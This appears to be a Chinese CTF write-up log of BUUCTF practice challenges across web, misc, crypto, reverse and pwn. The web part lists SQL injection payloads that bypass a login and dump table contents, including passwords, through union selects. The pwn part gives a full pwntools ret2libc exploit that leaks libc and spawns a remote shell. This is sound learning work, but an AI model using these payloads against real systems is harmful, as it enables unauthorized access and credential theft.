题解
web:[极客大挑战 2019]Havefun
打开是一个猫猫的图片
查看源代码
就是一个简单的get传参,直接在url后面输入cat=dog即可
有点水,再来一题
[极客大挑战 2019]LoveSQL
熟悉的界面,不熟悉的注入
尝试上次的方法,注入万能密码试试
' or '1'='1'#
得到一串乱码,疑似是flag ,但是输入是错误的
登录admin界面试试,还是回显这个界面
不过好处是可以得知注入类型为字符型,闭合方式为单引号闭合
尝试爆字段
username=1' order by 3#时
username=1' order by 4# 时
说明字段数为3
查字段,第三个字段是password
1' union select 1,2,3 #
爆库名
1' union select 1,2,database() #
联合爆表
1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database()) #
得到两个表名geekuser和l0ve1ysq1,题目名字就叫loveSQL,先爆第二个表的字段
1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1') #
最后爆一下内容
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) #
flag{bdcc52c2-84d6-4c78-b608-20f7aefbb6c4}
misc:梅花香之苦寒来
参考:【BUUCTF】梅花香自苦寒来_buuctf 梅花香之苦寒来-CSDN博客
下载附件,得到一张图片
查看图片属性,没有什么东西
用010打开文件夹,搜索jpg文件尾FF D9,有一堆16进制编码
复制在新建的文本文件中
这里可以用随波逐流直接16进制转文件
也可以写脚本转成文件
# 读取十六进制表示的文本文件
with open('C:\\Users\\aran\\Desktop\\1234567890.txt', 'r') as h:val = h.read()# 将转换后的字符写入新的文本文件
with open('C:\\Users\\aran\\Desktop\\6666.txt', 'w') as re:for i in range(0, len(val), 2):# 每两个字符组成一个十六进制数,转换为整数,再转换为ASCII字符hex_val = int(val[i:i+2], base=16)ascii_char = chr(hex_val)# 打印并写入转换后的字符print(ascii_char, end="")re.write(ascii_char)得到一大串类似于坐标的东西
联想到前面说的你会画图吗,猜想这些坐标是用来画图的
使用gnuplot进行画图,使用gnuplot之前需要先将坐标格式转换成gnuplot可以识别的格式
with open('result.txt', 'r') as res: # 坐标格式文件比如(7,7)re = res.read()res.close()with open('gnuplotTxt.txt', 'w') as gnup: # 将转换后的坐标写入gnuplotTxt.txtre = re.split()tem = ''for i in range(0, len(re)):tem = re[i]tem = tem.lstrip('(')tem = tem.rstrip(')')for j in range(0, len(tem)):if tem[j] == ',':tem = tem[:j] + ' ' + tem[j+1:]gnup.write(tem + '\n')gnup.close()
转化完格式后,将转化后的2.txt放在gnuplot的目录下
plot "2.txt"
得到二维码
最后扫描即可得到flag
crypto:[AFCTF2018]Morse
下载附件,是一个摩斯密码
随波逐流解码
提交是错的,大写转小写试试
还是不行,仔细观察字符串发现字符串由数字和字母组成,并且字母没有超过F的,于是尝试用HEX解密 ,就可以了
reverse:[WUSTCTF2020]level3
下载附件,exeinfope查看,64位无壳
ida打开,查看主函数
puts函数那里有一串base64编码,解码一下,解不出来
再翻翻左边的函数,有一个长得很丑的,点进去看,找到了base64加密变表的函数
将加密表变换一下写个解密exp
import base64
b64table='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'b64tablelst=list(b64table)
for i in range(0,10):v1=b64tablelst[i]b64tablelst[i]=b64tablelst[19-i]result=19-ib64tablelst[result]=v1
new_b64table=''
for i in range(0,len(b64tablelst)):new_b64table+=b64tablelst[i]print(new_b64table)
enb64="d2G0ZjLwHjS7DmOzZAY0X2lzX3CoZV9zdNOydO9vZl9yZXZlcnGlfD=="
flag=base64.b64decode(enb64.translate(str.maketrans(b64table,new_b64table)))
print(flag)pwn:ciscn_2019_en_2
exeinfope查看,64位无壳
ida64打开,查看主函数,,先是一个嵌套循环,然后输入v4的值,根据v4值来执行下面的代码
输入1进入encrypt()函数内,然后利用gets函数可以实现栈溢出攻击
没有system函数,shift+F12找找有没有/bin/sh/
并没有
跟昨天那个题有点相似了,应该也是构造rop链
思路:通过put函数泄露libc地址,然后拿到system函数和/bin/sh字符串实现攻击。
exp:
from pwn import *
from LibcSearcher import *elf = ELF("C:\Users\aran\Downloads\ciscn_2019_en_2")p = remote("node5.buuoj.cn",28274)main_addr = elf.sym['main']
#print(hex(main_addr))
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']pop_rdi_ret = 0x0000000000400c83payload1 = b'a'*(0x50+0x8) +p64(pop_rdi_ret)
payload1+=p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter("Input your choice!",'1')
p.sendlineafter("Input your Plaintext to be encrypted",payload1)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_addr = libc_base + libc.dump('str_bin_sh')payload2 = b'a'*(0x50+0x8) + p64(0x04006b9)+p64(pop_rdi_ret)#ret_addr=0x04006b9
payload2+=p64(bin_addr)+ p64(sys_addr)
p.sendlineafter("Input your choice!",'1')
p.sendlineafter("Input your Plaintext to be encrypted",payload2)
p.interactive()由于要安装libcsearcher库,俺安了一天也没安好(昨天也一直在安库),先安着,等会再来看
知识点
16进制编码特征:使用16个字符来表示数据,这些字符分别是0-9的数字和A-F的字母。其中,A-F分别代表10-15的十进制数值。值得注意的是,16进制编码中的字母不区分大小写,即a-f和A-F是等价的。
